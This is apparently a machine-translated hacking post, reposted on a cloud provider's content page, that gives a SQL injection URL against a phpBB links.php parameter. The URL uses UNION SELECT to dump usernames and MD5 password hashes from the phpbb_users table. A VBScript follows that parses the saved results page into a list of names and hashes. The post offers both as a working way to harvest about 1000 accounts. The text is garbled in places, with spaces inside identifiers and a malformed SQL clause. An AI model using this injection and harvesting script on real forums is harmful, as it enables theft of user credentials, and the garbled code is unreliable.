A piece of vbs code that extracts the user name and MD5

Source: Internet
Author: User

Injection Code As follows:

Links. php? T = SEARCH & search_keywords = ASD & START = Union select 1, username, user_password, from phpbb_users where user_id limit /*

In this way, 1000 user names and MD5 are extracted and saved as htm. It is very troublesome to extract MD5 and user names one by one, and some code is written. I am very satisfied with this Code. It is estimated that it is the simplest extraction method.

The Code is as follows:

'usage example: cscript // nologo this. vbs c: \ 11000.htm> C: \ 1.txt copy Code the code is as follows: on error resume next
set Ie = wscript. createobject ("internetexplorer. application ")
set Arg = wscript. arguments
If Arg. count = 0 then wscript. quit
IE. visible = false
IE. navigate Arg (0)
While IE. busy
wscript. sleep 100
Wend
DO
wscript. sleep 200
loop until IE. readystate = 4
for I = 12 to IE. document. links. length-2
DATA = IE. document. links (I ). innertext
If data <> 13 then
wscript. echo Data
wscript. echo IE. document. links (I ). alt
end if
next
msgbox "converted"

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.